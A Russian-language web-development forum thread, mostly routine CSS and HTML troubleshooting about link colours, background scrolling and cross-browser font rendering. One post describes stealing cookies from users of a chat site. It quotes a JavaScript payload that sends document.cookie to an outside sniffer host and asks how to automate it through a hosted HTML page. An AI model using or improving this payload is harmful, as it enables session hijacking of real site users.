-slim- выложи кусок кода CSS и HTML, , которые участвуют в этом скрине. Иначе не понятно в чем причина.
У меня есть бесплатный хостинг. Сижу в чате Murclub.ru/ так вот пытался вытащить куки- вместо murclub.ru вставляю JavaScript код для адресной строки с HPC(hacker pro club) сниффера. приходят кукисы. так вот я подумал что лёгкий способ добычи куки это создать Html файл на своём хостинге чтобы он выполнял такие действия. переходишь по Мой_хост.ру/Индекс.хтмл он задаёт действия браузеру. Браузер заходит по сылке murclub.ru потом редирект на JavaScript ( javascript:document.write('<script>img = new Image(); img.src = "http://httpz.ru/neyyxt5lhop.gif?"+document.cookie;</script>') ) так вот какой код сделать? в хтмл файле у меня получился вот Но проверяя его приходит пустой лог 15.10.2011 17:46:39 +02:00 [] IP: --.--.--.-- Query: empty REFERER: empty AGENT: Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00 в чём оплашал? извените только учусь
Как сделать чтоб фон скролился до конца своих размеров(если не влазит) и про достижении конца экрана - стал фиксированым (background-attachment:fixed)? Я так понимаю нужно сделать это на дивах... (как менюшка левая у nnm.ru), Но как не представляю
Код: Все варианты уже перепробовал, не могу сменить цвет у ссылки Code: h3.ProductTitle { color: #fac701; text-align: center; }
2pick, задать height статично у элемента + поставить ему overflow-y: scroll; upd: на том сайте при определённом scrollY этот блок тупо становится с позиционирование absolute или fixed. Komyak, добавить ещё одно правило - для ссылки Code: h3.ProductTitle a{ color: #fac701; }
Помогите с задачей. Есть центральная часть сайта и футер. Нужно для каждой из частей установить свой background. Вот примерная конструкция: по отдельности каждый фон работает, а вот вместе никак.. код css (div1 и div4)
Доброго времени суток. Ребятки, подскажите, в чём проблема. При просмотре сайта в опере всё отлично отображается, но если смотреть через хром или мозилу, то все тексты выделяются безобразным жирным шрифтом. Как можно решить эту проблему?
На самом деле ты сейчас задел вечную проблему которая по сей день сводит сума многих веб дизайнеров. Конкретнее это называется - кроссбраузерность. Весьма не простая задача добиться того чтобы страница одинаково отображалась во всех браузерах. Для решения твоей задачи нужно использовать css стили для форматирования текста
Я обычно не люблю отвечать кратко, всегда стараюсь расписать как можно более понятно.. но данный вопрос настолько тривиален что как бы я не сформулировал свой ответ тебе на порядок проще будет найти решение просто почитав про CSS стили в интернетах. Как говориться: взялся за гуж, не говори что не дуж. Если разбираешься с HTML начинай разбираться и с CSS. RTFM
Хочешь получить качественный ответ - правильно сформулируй вопрос. В твоём посте ни строчки кода не увидел.